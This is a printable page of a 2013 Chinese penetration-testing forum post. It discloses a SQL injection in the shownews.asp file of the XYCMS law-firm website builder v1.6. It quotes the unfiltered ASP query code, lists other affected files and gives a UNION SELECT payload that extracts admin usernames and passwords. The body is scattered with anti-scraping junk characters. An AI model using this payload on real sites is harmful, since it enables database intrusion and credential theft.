中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]
作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似/ L% a, w6 F3 t' Z# y6 r

3 i" j. M2 G1 {) s; a淫荡分割线  Z+ s3 n2 O* V- @6 K
--------------------------------------------------------
% O* H# J7 p+ O& i; w) [
  }0 x0 a3 j) H% V2 t审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)6 v9 {. j8 `( x# O0 z4 ]& A; j
源码地址:http://down.chinaz.com/soft/29233.htm- G$ U2 }, e! b
) E+ w  v# w' j2 W. l
漏洞文件:shownews.asp
6 a8 X% V% z, h漏洞代码:7-13行" k4 ]( e; S) K3 E  w6 D) i

5 G5 H( f! y) G$ R5 {* \3 K# A2 Q
) N% B% ?+ G' X<% % n7 A6 Y% W4 I; M+ a; \$ g
id=request.QueryString("id"); `) j' _% @8 z3 e. r
   
+ N: h% E* a4 L7 i8 R; _* y6 p7 l9 eset snews=server.createobject("adodb.recordset") 4 M# O  g4 h9 }0 @' v- k4 \
exec="select * from [news] where id="&id
8 T. ?  a' K' l  e# O0 u0 K& f3 \snews.open exec,conn,1,1
( I. q) o$ \! @7 X8 ]) D: O%>
' k+ K! U2 c" Y" {0 [, R6 m
; Z  L) W! Z1 f1 ~+ H" H 6 |# N2 M* V9 e& p; D
什么过滤都没有  直造成注入
" M0 c3 ^7 i% }. J
. ^1 v/ f7 |) h9 p# q注入点:http://127.0.0.1:99/shownews.asp?id=xx0 v& c9 n/ U4 ^( C
. O9 i- L( L$ t8 ^
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找% z- A- N# b: z

3 \9 Z9 K  ?% l/ h5 }6 c2 m ! G+ a3 k2 C6 t; z
exp: union select 1,admin,password,4,5,7 from admin_user7 d- Y+ C, `# q/ k7 X( P' y; \$ y

5 _' w; g+ b4 G4 @* Z



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2